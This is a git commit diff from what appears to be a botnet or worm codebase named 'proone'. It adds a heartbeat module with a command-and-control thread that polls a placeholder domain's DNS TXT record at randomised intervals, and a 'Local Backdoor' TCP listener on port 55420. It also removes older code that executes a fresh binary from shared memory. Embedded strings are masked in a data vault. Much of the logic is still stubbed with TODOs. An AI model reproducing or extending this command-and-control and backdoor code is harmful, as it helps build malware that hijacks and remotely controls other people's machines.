diff options
| author | David Timber <mieabby@gmail.com> | 2020-08-24 09:37:43 +0930 |
|---|---|---|
| committer | David Timber <mieabby@gmail.com> | 2020-08-24 10:05:29 +0930 |
| commit | acf0b7a45171555eba2c10a6ef84f915c62f6791 (patch) | |
| tree | 7253e8d86a199948530671c8bf59ecbb2c6e08f8 | |
| parent | 076671e7aa28451de087088c2e47f9e6064ae434 (diff) | |
* htbt checkpoint
* Change PRNE_BUILD_ENTROPY to uint8_t array
* endian.h problem
* Remove "-I." CFLAG added by Automake ()
* Moved endian conversion macros to endian.h
* Moved DNS server config from config.h to resolv.h to reduce compile time
* Refactor resolv_ensure_act_dns_fd() to reduce binary size
| -rw-r--r-- | configure.ac | 4 | ||||
| -rw-r--r-- | proone.code-workspace | 4 | ||||
| -rw-r--r-- | src/Makefile.am | 3 | ||||
| -rw-r--r-- | src/config.h | 54 | ||||
| -rw-r--r-- | src/data.h | 3 | ||||
| -rw-r--r-- | src/dvault.c | 7 | ||||
| -rw-r--r-- | src/endian.h | 66 | ||||
| -rw-r--r-- | src/htbt-worker.c | 235 | ||||
| -rw-r--r-- | src/htbt-worker.h | 9 | ||||
| -rw-r--r-- | src/htbt.c | 387 | ||||
| -rw-r--r-- | src/htbt.h | 14 | ||||
| -rw-r--r-- | src/proone-mkdvault.c | 16 | ||||
| -rwxr-xr-x | src/proone-resolv | bin | 0 -> 144256 bytes | |||
| -rw-r--r-- | src/proone-resolv.c | 16 | ||||
| -rw-r--r-- | src/proone.c | 188 | ||||
| -rw-r--r-- | src/protocol.c | 11 | ||||
| -rw-r--r-- | src/pth.c | 18 | ||||
| -rw-r--r-- | src/resolv.c | 111 | ||||
| -rw-r--r-- | src/resolv.h | 56 | ||||
| -rw-r--r-- | src/util_ct.h | 72 | ||||
| -rw-r--r-- | src/util_rt.c | 37 | ||||
| -rw-r--r-- | src/util_rt.h | 6 |
22 files changed, 768 insertions, 549 deletions
diff --git a/configure.ac b/configure.ac index 5f310b9..038810b 100644 --- a/configure.ac +++ b/configure.ac @@ -28,7 +28,9 @@ AC_CHECK_LIB([mbedtls], [mbedtls_ssl_init], [], [AC_MSG_ERROR([mbedtls not found AC_CHECK_LIB([mbedx509], [mbedtls_x509_crt_parse], [], [AC_MSG_ERROR([mbedtls not found])]) AC_CHECK_LIB([pthsem], [pth_init], [], [AC_MSG_ERROR([pthsem not found])]) -AC_DEFINE_UNQUOTED([PRNE_BUILD_ENTROPY], ["`uuidgen -r`"]) +AC_DEFINE_UNQUOTED( + [PRNE_BUILD_ENTROPY], + [{ $(xxd -l16 -ps /dev/urandom | sed -E s/\(\\S{2}\)/0x\&,\ /g | sed -E s/,\ \$//) }]) AC_CONFIG_FILES([Makefile src/Makefile]) AC_OUTPUT diff --git a/proone.code-workspace b/proone.code-workspace index d5a881f..aa336bb 100644 --- a/proone.code-workspace +++ b/proone.code-workspace @@ -5,13 +5,15 @@ } ], "settings": { + "editor.tabSize": 4, "editor.insertSpaces": false, + "files.trimTrailingWhitespace": true, "C_Cpp.default.cStandard": "c11", "C_Cpp.default.defines": [ // "_POSIX_C_SOURCE=200112L", "_GNU_SOURCE=1", // TODO: remove "PRNE_DEBUG", - "PRNE_BUILD_ENTROPY=\"84532ab2-0857-4137-9daf-abd990684889\"", + "PRNE_BUILD_ENTROPY={ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }", "PRNE_BIN_ALIGNMENT=8"], "C_Cpp.default.compilerArgs": [ "-pedantic", diff --git a/src/Makefile.am b/src/Makefile.am index dcaff7c..785aeb5 100644 --- a/src/Makefile.am +++ b/src/Makefile.am @@ -7,6 +7,8 @@ AM_CFLAGS += -g -O0 -DPRNE_DEBUG else AM_CFLAGS += -g -Os endif +# Override AM's default to remove "-I." flag +DEFAULT_INCLUDES = noinst_LIBRARIES = libproone.a my_DATA = proone testlist @@ -48,6 +50,7 @@ proone: proone.bin dvault.bin ./build-utils.sh append-uint32 0 proone cat dvault.bin >> proone +proone_bin_CFLAGS = $(AM_CFLAGS) -fwhole-program proone_bin_LDFLAGS = -static proone_bin_LDADD = libproone.a proone_bin_SOURCES =\ diff --git a/src/config.h b/src/config.h index 13beaa4..04f73a9 100644 --- a/src/config.h +++ b/src/config.h @@ -17,56 +17,4 @@ #define PRNE_PROG_VER { 0x11, 0xf7, 0x6b, 0x87, 0x62, 0x1a, 0x47, 0x9c, 0xa2, 0x18, 0x5c, 0x55, 0x40, 0x33, 0x7c, 0x9f } extern const prne_arch_t prne_host_arch; -#define PRNE_RESOLV_NS_IPV4_GOOGLE_A\ - 0x8, 0x8, 0x8, 0x8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 -#define PRNE_RESOLV_NS_IPV4_GOOGLE_B\ - 0x8, 0x8, 0x4, 0x4, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 -#define PRNE_RESOLV_NS_IPV4_CLOUDFLARE_A\ - 0x1, 0x1, 0x1, 0x1, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 -#define PRNE_RESOLV_NS_IPV4_CLOUDFLARE_B\ - 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 -#define PRNE_RESOLV_NS_IPV4_QUAD9_A\ - 0x9, 0x9, 0x9, 0xa, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 -#define PRNE_RESOLV_NS_IPV4_QUAD9_B\ - 0x95, 0x70, 0x70, 0xa, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 -#define PRNE_RESOLV_NS_IPV4_CLEANBROWSING_A\ - 0xb9, 0xe4, 0xa8, 0x9, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 -#define PRNE_RESOLV_NS_IPV4_CLEANBROWSING_B\ - 0xb9, 0xe4, 0xa9, 0x9, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 -#define PRNE_RESOLV_NS_POOL_IPV4 {\ - PRNE_RESOLV_NS_IPV4_GOOGLE_A,\ - PRNE_RESOLV_NS_IPV4_GOOGLE_B,\ - PRNE_RESOLV_NS_IPV4_CLOUDFLARE_A,\ - PRNE_RESOLV_NS_IPV4_CLOUDFLARE_B,\ - PRNE_RESOLV_NS_IPV4_QUAD9_A,\ - PRNE_RESOLV_NS_IPV4_QUAD9_B,\ - PRNE_RESOLV_NS_IPV4_CLEANBROWSING_A,\ - PRNE_RESOLV_NS_IPV4_CLEANBROWSING_B\ -} - -#define PRNE_RESOLV_NS_IPV6_GOOGLE_A\ - 0x20, 0x1, 0x48, 0x60, 0x48, 0x60, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x88, 0x88 -#define PRNE_RESOLV_NS_IPV6_GOOGLE_B\ - 0x20, 0x1, 0x48, 0x60, 0x48, 0x60, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x88, 0x44 -#define PRNE_RESOLV_NS_IPV6_CLOUDFLARE_A\ - 0x26, 0x6, 0x47, 0x0, 0x47, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x11, 0x11 -#define PRNE_RESOLV_NS_IPV6_CLOUDFLARE_B\ - 0x26, 0x6, 0x47, 0x0, 0x47, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x10, 0x1 -#define PRNE_RESOLV_NS_IPV6_QUAD9_A\ - 0x26, 0x20, 0x0, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xfe -#define PRNE_RESOLV_NS_IPV6_QUAD9_B\ - 0x26, 0x20, 0x0, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x9 -#define PRNE_RESOLV_NS_IPV6_CLEANBROWSING_A\ - 0x2a, 0xd, 0x2a, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x2 -#define PRNE_RESOLV_NS_IPV6_CLEANBROWSING_B\ - 0x2a, 0xd, 0x2a, 0x0, 0x0, 0x2, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x2 -#define PRNE_RESOLV_NS_POOL_IPV6 {\ - PRNE_RESOLV_NS_IPV6_GOOGLE_A,\ - PRNE_RESOLV_NS_IPV6_GOOGLE_B,\ - PRNE_RESOLV_NS_IPV6_CLOUDFLARE_A,\ - PRNE_RESOLV_NS_IPV6_CLOUDFLARE_B,\ - PRNE_RESOLV_NS_IPV6_QUAD9_A,\ - PRNE_RESOLV_NS_IPV6_QUAD9_B,\ - PRNE_RESOLV_NS_IPV6_CLEANBROWSING_A,\ - PRNE_RESOLV_NS_IPV6_CLEANBROWSING_B\ -} +#define PRNE_CNC_TXT_REC "cnc.prne.mydomain.test" // CHANGE ME @@ -4,7 +4,7 @@ typedef enum { PRNE_DATA_KEY_NONE = -1, - + PRNE_DATA_KEY_PROG_VER, PRNE_DATA_KEY_PROC_LIM_SHM, PRNE_DATA_KEY_X509_CA_CRT, @@ -15,6 +15,7 @@ typedef enum { PRNE_DATA_KEY_X509_C_KEY, PRNE_DATA_KEY_RESOLV_NS_IPV4, PRNE_DATA_KEY_RESOLV_NS_IPV6, + PRNE_DATA_KEY_CNC_TXT_REC, NB_PRNE_DATA_KEY } prne_data_key_t; diff --git a/src/dvault.c b/src/dvault.c index 3c548fe..1fdb646 100644 --- a/src/dvault.c +++ b/src/dvault.c @@ -1,6 +1,7 @@ #include "dvault.h" #include "util_rt.h" #include "util_ct.h" +#include "endian.h" #include <stdint.h> #include <stdbool.h> @@ -22,7 +23,7 @@ static void invert_entry (const prne_data_key_t key, prne_data_type_t *type, con m_salt = m_data[m_offsets[key]]; m_unmasked = m_data + m_offsets[key] + 1; prne_dvault_invert_mem(3, m_unmasked, m_salt, 0, m_mask); - + *type = (prne_data_type_t)m_unmasked[0]; entry_len = ((size_t)m_unmasked[1] << 8) | ((size_t)m_unmasked[2] << 0); m_unmasked_size = 3 + entry_len; @@ -51,7 +52,7 @@ prne_data_type_t prne_data_type_fstr (const char *str) { if (prne_nstreq(str, prne_data_type_tostr(PRNE_DATA_TYPE_BIN))) { return PRNE_DATA_TYPE_BIN; } - + return PRNE_DATA_TYPE_NONE; } @@ -83,7 +84,7 @@ prne_dvault_mask_result_t prne_dvault_mask (const prne_data_type_t type, const u if (data_size > 0xFFFF - 4) { ret.result = PRNE_DVAULT_MASK_TOO_LARGE; - return ret; + return ret; } ret.size = data_size + 4; diff --git a/src/endian.h b/src/endian.h new file mode 100644 index 0000000..2a63b4b --- /dev/null +++ b/src/endian.h @@ -0,0 +1,66 @@ +#pragma once +/********************************************************************** +* Endianess Independent Byte Extraction +***********************************************************************/ +/* prne_getmsbN(x, n) +* +* Extract nth most significant byte of x. +*/ +#define prne_getmsb(x, n, w, s)\ + (uint8_t)(((w)(x) & (w)0xFF << (s - 8 * (n))) >> (s - 8 * (n))) +#define prne_getmsb64(x, n) prne_getmsb((x), (n), uint_fast64_t, 56) +#define prne_getmsb32(x, n) prne_getmsb((x), (n), uint_fast32_t, 24) +#define prne_getmsb16(x, n) prne_getmsb((x), (n), uint_fast16_t, 8) + +/* prne_recmb_msbN(...) +* +* Recombine bytes in big-endian order to uintN. +*/ +#define prne_recmb_msb64(a, b, c, d, e, f, g, h) (\ + ((uint_fast64_t)(a) << 56) |\ + ((uint_fast64_t)(b) << 48) |\ + ((uint_fast64_t)(c) << 40) |\ + ((uint_fast64_t)(d) << 32) |\ + ((uint_fast64_t)(e) << 24) |\ + ((uint_fast64_t)(f) << 16) |\ + ((uint_fast64_t)(g) << 8) |\ + ((uint_fast64_t)(h) << 0)\ +) +#define prne_recmb_msb32(a, b, c, d) (\ + ((uint_fast32_t)(a) << 24) |\ + ((uint_fast32_t)(b) << 16) |\ + ((uint_fast32_t)(c) << 8) |\ + ((uint_fast32_t)(d) << 0)\ +) +#define prne_recmb_msb16(a, b) (\ + ((uint_fast16_t)(a) << 8) |\ + ((uint_fast16_t)(b) << 0)\ +) + +/* Machine Characteristics +*/ +#define PRNE_ENDIAN_LITTLE 1 +#define PRNE_ENDIAN_BIG 2 + +#ifdef __GNUC__ + #if __BYTE_ORDER__ == __ORDER_BIG_ENDIAN__ + #define PRNE_HOST_ENDIAN PRNE_ENDIAN_BIG + #elif __BYTE_ORDER__ == __ORDER_LITTLE_ENDIAN__ + #define PRNE_HOST_ENDIAN PRNE_ENDIAN_LITTLE + #else + #error "FIXME!" + #endif +#else + #error "FIXME!" +#endif + +#define prne_einv16(x) (((0xFF00 & x) >> 8) | ((0x00FF & x) << 8)) + +#if PRNE_HOST_ENDIAN == PRNE_ENDIAN_BIG +#define prne_htobe16(x) (x) +#define prne_be16toh(x) (x) +#elif PRNE_HOST_ENDIAN == PRNE_ENDIAN_LITTLE +#define prne_htobe16(x) prne_einv16(x) +#define prne_be16toh(x) prne_einv16(x) +#else +#endif diff --git a/src/htbt-worker.c b/src/htbt-worker.c deleted file mode 100644 index d9d5742..0000000 --- a/src/htbt-worker.c +++ /dev/null @@ -1,235 +0,0 @@ -#include "htbt-worker.h" -#include "protocol.h" -#include "proone.h" -#include "util_rt.h" -#include "dvault.h" - -#include <stdlib.h> -#include <string.h> - -#include <unistd.h> -#include <fcntl.h> -#include <sys/socket.h> -#include <arpa/inet.h> -#include <netinet/in.h> -#include <sys/mman.h> -#include <sys/stat.h> - -#define DECL_CTX_PTR(p) hb_w_ctx_t *ctx = (hb_w_ctx_t*)p; - -typedef struct hb_w_ctx hb_w_ctx_t; - -struct hb_w_ctx { - int fd; - int domain; - uint8_t rcv_buf[256]; - bool finalised; -}; - - -#if 0 -static int create_ny_bin_shm (prne_rnd_engine_t *rnd) { - static const size_t str_len = sizeof(prne_s_g->ny_bin_shm_name); - - prne_s_g->ny_bin_shm_name[0] = '/'; - prne_s_g->ny_bin_shm_name[str_len - 1] = 0; - prne_rnd_anum_str(rnd, prne_s_g->ny_bin_shm_name + 1, str_len - 2); - - return shm_open(prne_s_g->ny_bin_shm_name, O_RDWR | O_CREAT | O_TRUNC, 0700); -} - -static void exec_ny_bin (void) { - // Just die on error - static const size_t proc_fd_path_size = 14 + 11 + 1; - int fd; - uint8_t *data; - size_t i; - const char **args; - struct stat st; - char *proc_fd_path, *real_shm_path; - prne_htbt_cmd_t cmd; - - prne_htbt_init_cmd(&cmd); - - fd = shm_open(prne_s_g->ny_bin_shm_name, O_RDONLY, 0); - if (fd < 0) { - abort(); - } - if (fstat(fd, &st) < 0 || st.st_size <= 0 || (size_t)st.st_size < prne_s_g->ny_bin_size) { - abort(); - } - data = (uint8_t*)mmap(NULL, (size_t)st.st_size, PROT_READ, MAP_SHARED, fd, 0); - - if (prne_htbt_deserialise_cmd(data + prne_s_g->ny_bin_size, (size_t)st.st_size - prne_s_g->ny_bin_size, NULL, &cmd) != PRNE_HTBT_DESER_RET_OK) { - abort(); - } - - munmap(data, (size_t)st.st_size); - data = NULL; - ftruncate(fd, prne_s_g->ny_bin_size); - - args = prne_malloc(sizeof(const char*), (size_t)cmd.argc + 2); - for(i = 1; i <= cmd.argc; i += 1) { - args[i] = cmd.mem + cmd.offset_arr[i]; - } - args[i] = NULL; - - proc_fd_path = prne_malloc(1, proc_fd_path_size); - snprintf(proc_fd_path, proc_fd_path_size, "/proc/self/fd/%d", fd); - if (lstat(proc_fd_path, &st) < 0) { - abort(); - } - - real_shm_path = prne_malloc(1, st.st_size + 1); - if (readlink(proc_fd_path, real_shm_path, st.st_size) != st.st_size) { - abort(); - } - prne_free(proc_fd_path); - proc_fd_path = NULL; - args[0] = real_shm_path; - - fchmod(fd, 0777); - prne_close(fd); - fd = -1; - - if (execv(real_shm_path, (char *const*)args) < 0) { - abort(); - } -} -#endif - - -static void heartbeat_worker_free (void *in_ctx) { - DECL_CTX_PTR(in_ctx); - prne_close(ctx->fd); - prne_free(ctx); -} - -static void heartbeat_worker_fin (void *in_ctx) { - DECL_CTX_PTR(in_ctx); - ctx->finalised = true; -} - -static void heartbeat_worker_work (void *in_ctx, const prne_worker_sched_info_t *sched_info, prne_worker_sched_req_t *sched_req) { - DECL_CTX_PTR(in_ctx); - - if (sched_req->pollfd_ready) { - const short revents = sched_req->pollfd_arr[0].revents; - - if (revents & (POLLERR | POLLHUP | POLLNVAL)) { - ctx->finalised = true; - sched_req->flags = PRNE_WORKER_SCHED_FLAG_NONE; - return; - } - if (revents & POLLIN) { - socklen_t addr_len; - - // TODO - - if (ctx->domain == AF_INET) { - struct sockaddr_in remote_addr; - - addr_len = sizeof(struct sockaddr_in); - if (recvfrom(ctx->fd, ctx->rcv_buf, sizeof(ctx->rcv_buf), 0, (struct sockaddr*)&remote_addr, &addr_len) == sizeof(ctx->rcv_buf)) { - prne_dvault_invert_mem(sizeof(ctx->rcv_buf) - 1, ctx->rcv_buf + 1, ctx->rcv_buf[0]); - sendto(ctx->fd, ctx->rcv_buf + 1, sizeof(ctx->rcv_buf) - 1, 0, (const struct sockaddr*)&remote_addr, addr_len); - } - } - else { - struct sockaddr_in6 remote_addr; - - addr_len = sizeof(struct sockaddr_in6); - if (recvfrom(ctx->fd, ctx->rcv_buf, sizeof(ctx->rcv_buf), 0, (struct sockaddr*)&remote_addr, &addr_len) == sizeof(ctx->rcv_buf)) { - prne_dvault_invert_mem(sizeof(ctx->rcv_buf) - 1, ctx->rcv_buf + 1, ctx->rcv_buf[0]); - sendto(ctx->fd, ctx->rcv_buf + 1, sizeof(ctx->rcv_buf) - 1, 0, (const struct sockaddr*)&remote_addr, addr_len); - } - } - } - } - - sched_req->flags = PRNE_WORKER_SCHED_FLAG_POLL; - sched_req->mem_func.alloc(sched_req, 1); - sched_req->pollfd_arr[0].fd = ctx->fd; - sched_req->pollfd_arr[0].events = POLLIN; -} - -static bool heartbeat_worker_has_finalised (void *in_ctx) { - DECL_CTX_PTR(in_ctx); - return ctx->finalised; -} - - -bool prne_alloc_htbt_worker (prne_worker_t *w) { - bool ret = true; - hb_w_ctx_t *ctx = NULL; - - ctx = (hb_w_ctx_t*)prne_malloc(sizeof(hb_w_ctx_t), 1); - if (ctx == NULL) { - ret = false; - goto END; - } - ctx->fd = -1; - ctx->domain = 0; - ctx->finalised = false; - - ctx->fd = socket(AF_INET6, SOCK_DGRAM, 0); - if (ctx->fd < 0) { - ctx->fd = socket(AF_INET, SOCK_DGRAM, 0); - - if (ctx->fd < 0) { - ret = false; - goto END; - } - ctx->domain = AF_INET; - } - else { - ctx->domain = AF_INET6; - } - - if (fcntl(ctx->fd, F_SETFL, O_NONBLOCK) < 0) { - ret = false; - goto END; - } - - if (ctx->domain == AF_INET) { - struct sockaddr_in local_addr; - - memset(&local_addr, 0, sizeof(struct sockaddr_in)); - local_addr.sin_family = AF_INET; - local_addr.sin_port = htons(PRNE_HTBT_PROTO_PORT); - local_addr.sin_addr.s_addr = INADDR_ANY; - - if (bind(ctx->fd, (const struct sockaddr*)&local_addr, sizeof(struct sockaddr_in)) < 0) { - ret = false; - goto END; - } - } - else { - struct sockaddr_in6 local_addr; - - memset(&local_addr, 0, sizeof(struct sockaddr_in6)); - local_addr.sin6_family = AF_INET6; - local_addr.sin6_port = htons(PRNE_HTBT_PROTO_PORT); - - if (bind(ctx->fd, (const struct sockaddr*)&local_addr, sizeof(struct sockaddr_in6)) < 0) { - ret = false; - goto END; - } - } - - w->ctx = ctx; - w->free = heartbeat_worker_free; - w->fin = heartbeat_worker_fin; - w->work = heartbeat_worker_work; - w->has_finalised = heartbeat_worker_has_finalised; - -END: - if (!ret) { - if (ctx != NULL) { - prne_close(ctx->fd); - } - prne_free(ctx); - } - - return ret; -} diff --git a/src/htbt-worker.h b/src/htbt-worker.h deleted file mode 100644 index 9d4ac33..0000000 --- a/src/htbt-worker.h +++ /dev/null @@ -1,9 +0,0 @@ -#pragma once -#include "worker.h" - -#include <stddef.h> -#include <stdbool.h> -#include <stdint.h> - - -bool prne_alloc_htbt_worker (prne_worker_t *w); diff --git a/src/htbt.c b/src/htbt.c new file mode 100644 index 0000000..502c1e4 --- /dev/null +++ b/src/htbt.c @@ -0,0 +1,387 @@ +#include "htbt.h" +#include "util_rt.h" +#include "protocol.h" +#include "llist.h" +#include "dvault.h" +#include "pth.h" +#include "endian.h" + +#include <errno.h> +#include <fcntl.h> +#include <poll.h> + +// CNCP interval: HTBT_CNCP_INT_MIN + variance +#define HTBT_CNCP_INT_MIN 1800000 // half an hour minimum interval +#define HTBT_CNCP_INT_VAR 1800000 // half an hour variance +#define HTBT_CNCP_PORT prne_htobe16(55420) + +typedef struct { + pth_t pth; + prne_htbt_t *parent; + struct pollfd pfd; +} htbt_lbd_client_t; + +typedef struct { + pth_mutex_t lock; + pth_cond_t cond; + prne_htbt_op_t op; + void *req_body; // NULL if abandoned + prne_htbt_status_t rsp; +} htbt_req_slip_t; + +struct prne_htbt { + pth_t sigterm_pth; + mbedtls_ctr_drbg_context *rnd; + prne_resolv_t *resolv; + prne_llist_t req_q; + bool loop_flag; + struct { // Main + pth_mutex_t lock; + pth_cond_t cond; + } main; + struct { // CNC DNS Record Probe + pth_t pth; + pth_mutex_t lock; + pth_cond_t cond; + prne_pth_cv_t cv; + } cncp; + struct { // Local Backdoor + pth_t pth; + struct pollfd pfd; + prne_llist_t conn_list; // TODO: init + } lbd; +}; + +#define HTBT_INTP_CTX(x) prne_htbt_t *ctx = (prne_htbt_t*)(x); + + +static void fin_htbt_wkr (void *p) { + // TODO +} + +static void free_htbt_wkr_ctx (void *p) { + HTBT_INTP_CTX(p); + + // TODO + + if (ctx->cncp.pth != NULL) { + pth_abort(ctx->cncp.pth); + } + if (ctx->lbd.pth != NULL) { + pth_abort(ctx->lbd.pth); + } +} + +static void *htbt_main_entry (void *p) { + HTBT_INTP_CTX(p); + + prne_assert(pth_resume(ctx->lbd.pth)); + prne_assert(pth_resume(ctx->cncp.pth)); + + // TODO + + prne_close(ctx->lbd.pfd.fd); + ctx->lbd.pfd.fd = -1; + prne_pth_cv_notify(&ctx->cncp.cv); + prne_assert(pth_join(ctx->lbd.pth, NULL)); + prne_assert(pth_join(ctx->cncp.pth, NULL)); + + return NULL; +} + +static void htbt_cncp_do_probe (prne_htbt_t *ctx) { + prne_resolv_prm_t prm; + bool r_ret; + + prne_resolv_init_prm(&prm); + + r_ret = prne_resolv_prm_gettxtrec( + ctx->resolv, + prne_dvault_get_cstr(PRNE_DATA_KEY_CNC_TXT_REC, NULL), + &ctx->cncp.cv, + &prm); + if (!r_ret) { + return; + } + + prne_pth_cond_timedwait(&ctx->cncp.cv, NULL, NULL); + if (prm.fut->qr == PRNE_RESOLV_QR_OK) { + // TODO + // <entries in hex> <txt rec name suffix> + } + + prne_resolv_free_prm(&prm); +} + +static void *htbt_cncp_entry (void *p) { // TODO: this works? + HTBT_INTP_CTX(p); + unsigned long intvar; + struct timespec timeout; + + while (true) { + // calc interval variance + intvar = 0; + mbedtls_ctr_drbg_random(ctx->rnd, &intvar, sizeof(intvar)); + intvar = HTBT_CNCP_INT_MIN + (intvar % HTBT_CNCP_INT_VAR); + timeout = prne_ms_timespec(intvar); + + // wait + prne_pth_cond_timedwait(&ctx->cncp.cv, &timeout, NULL); + if (!ctx->loop_flag) { + break; + } + + htbt_cncp_do_probe(ctx); + } + + return NULL; +} + +static void *htbt_lbd_client_entry (void *p) { + prne_llist_entry_t *ent = (prne_llist_entry_t*)p; + htbt_lbd_client_t *ctx = (htbt_lbd_client_t*)ent->element; + + // TODO + + prne_close(ctx->pfd.fd); + ctx->pfd.fd = -1; +} + +static void *htbt_lbd_entry (void *p) { + HTBT_INTP_CTX(p); + int fret; + pth_event_t ev = NULL, ev_sub; + prne_llist_entry_t *ent; + htbt_lbd_client_t *client; + bool rebuild_ev = true; + + while (true) { + if (rebuild_ev) { + pth_event_free(ev, TRUE); + ev = NULL; + + ent = ctx->lbd.conn_list.head; + while (ent != NULL) { + ev_sub = pth_event( + PTH_EVENT_TID | PTH_STATE_DEAD, + ((htbt_lbd_client_t*)ent->element)->pth); + prne_assert(ev_sub != NULL); + if (ev == NULL) { + ev = ev_sub; + } + else { + prne_assert(pth_event_concat(ev, ev_sub, NULL) != NULL); + } + + ent = ent->next; + } + + rebuild_ev = false; + } + + if (ctx->lbd.pfd.fd < 0) { + break; + } + fret = pth_poll_ev(&ctx->lbd.pfd, 1, -1, ev); + + if (ev != NULL && pth_event_occurred(ev)) { + ent = ctx->lbd.conn_list.head; + while (ent != NULL) { + client = (htbt_lbd_client_t*)ent->element; + + if (client->pfd.fd < 0) { + pth_join(client->pth, NULL); + prne_free(client); + ent = prne_llist_erase(&ctx->lbd.conn_list, ent); + rebuild_ev = true; + } + else { + ent = ent->next; + } + } + } + + if (fret < 0 && errno != EINTR) { + break; + } + else if (fret > 0) { + if (ctx->lbd.pfd.revents & (POLLERR | POLLHUP | POLLNVAL)) { + break; + } + else if (ctx->lbd.pfd.revents & POLLIN) { + client = NULL; + ent = NULL; + fret = accept(ctx->lbd.pfd.fd, NULL, NULL); + do { + if (fret < 0) { + break; + } + + client = (htbt_lbd_client_t*)prne_malloc( + sizeof(htbt_lbd_client_t), + 1); + if (client == NULL) { + break; + } + + client->pth = NULL; + client->parent = ctx; + client->pfd.fd = fret; + + ent = prne_llist_append(&ctx->lbd.conn_list, client); + if (ent == NULL) { + break; + } + + client->pth = pth_spawn( + PTH_ATTR_DEFAULT, + htbt_lbd_client_entry, + ent); + if (client->pth == NULL) { + break; + } + + fret = -1; + client = NULL; + ent = NULL; + rebuild_ev = true; + } while (false); + + if (client != NULL) { + if (client->pth != NULL) { + pth_abort(client->pth); + } + } + if (ent != NULL) { + prne_llist_erase(&ctx->lbd.conn_list, ent); + } + prne_close(fret); + } + } + } + + pth_event_free(ev, TRUE); + + ent = ctx->lbd.conn_list.head; + while (ent != NULL) { + client = (htbt_lbd_client_t*)ent->element; + + prne_close(client->pfd.fd); + client->pfd.fd = -1; + pth_join(client->pth, NULL); + + prne_free(client); + + ent = ent->next; + } + prne_llist_clear(&ctx->lbd.conn_list); + + return NULL; +} + +prne_htbt_t *prne_alloc_htbt_worker ( + prne_worker_t *w, + pth_t sigterm_pth, + prne_resolv_t *resolv, + mbedtls_ctr_drbg_context *ctr_drbg) +{ + prne_htbt_t *ret = NULL; + uint8_t m_sckaddr[prne_op_max( + sizeof(struct sockaddr_in), + sizeof(struct sockaddr_in6))]; + + if (sigterm_pth == NULL || ctr_drbg == NULL) { + errno = EINVAL; + goto ERR; + } + + ret = prne_calloc(sizeof(prne_htbt_t), 1); + if (ret == NULL) { + goto ERR; + } + + ret->sigterm_pth = sigterm_pth; + ret->rnd = ctr_drbg; + ret->resolv = resolv; + prne_init_llist(&ret->req_q); + ret->loop_flag = true; + pth_mutex_init(&ret->main.lock); + pth_cond_init(&ret->main.cond); + + ret->cncp.pth = NULL; + pth_mutex_init(&ret->cncp.lock); + pth_cond_init(&ret->cncp.cond); + ret->cncp.cv.broadcast = false; + ret->cncp.cv.lock = &ret->cncp.lock; + ret->cncp.cv.cond = &ret->cncp.cond; + + ret->lbd.pth = NULL; + ret->lbd.pfd.fd = -1; + prne_init_llist(&ret->lbd.conn_list); + + if (resolv != NULL) { + ret->cncp.pth = pth_spawn( + PTH_ATTR_DEFAULT, + htbt_cncp_entry, + ret); + if (ret->cncp.pth == NULL) { + goto ERR; + } + if (pth_suspend(ret->cncp.pth) == 0) { + goto ERR; + } + } + + do { + socklen_t sl; + + memzero(m_sckaddr, sizeof(m_sckaddr)); + if ((ret->lbd.pfd.fd = socket(AF_INET6, SOCK_STREAM, 0)) >= 0) { + ((struct sockaddr_in6*)m_sckaddr)->sin6_addr = in6addr_any; + ((struct sockaddr_in6*)m_sckaddr)->sin6_family = AF_INET6; + ((struct sockaddr_in6*)m_sckaddr)->sin6_port = HTBT_CNCP_PORT; + sl = sizeof(struct sockaddr_in6); + } + else if ((ret->lbd.pfd.fd = socket(AF_INET, SOCK_STREAM, 0)) >= 0) { + ((struct sockaddr_in*)m_sckaddr)->sin_addr.s_addr = INADDR_ANY; + ((struct sockaddr_in*)m_sckaddr)->sin_family = AF_INET; + ((struct sockaddr_in*)m_sckaddr)->sin_port = HTBT_CNCP_PORT; + sl = sizeof(struct sockaddr_in); + } + else { + break; + } + + if (fcntl(ret->lbd.pfd.fd, F_SETFL, O_NONBLOCK) != 0) { + break; + } + if (bind(ret->lbd.pfd.fd, (struct sockaddr*)m_sckaddr, sl) != 0) { + break; + } + ret->lbd.pfd.events = POLLIN; + + ret->lbd.pth = pth_spawn(PTH_ATTR_DEFAULT, htbt_lbd_entry, ret); + if (pth_suspend(ret->lbd.pth) == 0) { + goto ERR; + } + } while (false); + + if (ret->cncp.pth == NULL && ret->lbd.pth == NULL) { + // No producer + goto ERR; + } + + w->ctx = ret; + w->entry = htbt_main_entry; + w->fin = fin_htbt_wkr; + w->free_ctx = free_htbt_wkr_ctx; + + return ret; +ERR: + if (ret != NULL) { + const int saved_errno = errno; + free_htbt_wkr_ctx(ret); + errno = saved_errno; + } + return NULL; +} diff 